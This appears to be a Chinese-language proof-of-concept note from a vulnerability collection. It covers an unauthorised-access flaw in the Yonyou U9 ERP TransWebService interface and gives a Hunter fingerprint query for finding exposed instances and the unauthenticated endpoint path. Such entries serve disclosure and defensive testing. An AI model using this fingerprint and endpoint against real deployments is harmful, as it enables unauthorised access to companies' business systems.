POC/wpoc/用友OA/用友u9系统接口TransWebService存在未授权访问漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

17 lines
660 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 用友u9系统接口TransWebService存在未授权访问漏洞
用友U9秉承互联网基因是全球第一款基于SOA云架构的多组织企业互联网应用平台。U9以精细化管理、产业链协协同与社交化商业帮助多组织企业多事业部/多地点/多工厂/多法人在互联网时代实现商业模式创新、组织变革与管理升级。用友u9 TransWebService存在未授权访问漏洞
## Hunter
```javascript
web.body="logo-u9.png"
```
## poc
```plain
/U9Supplier/CS/Office/TransWebService.asmx
```
![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729854825599-c70fe318-3b26-4416-82ef-6d38998e1e0f.png)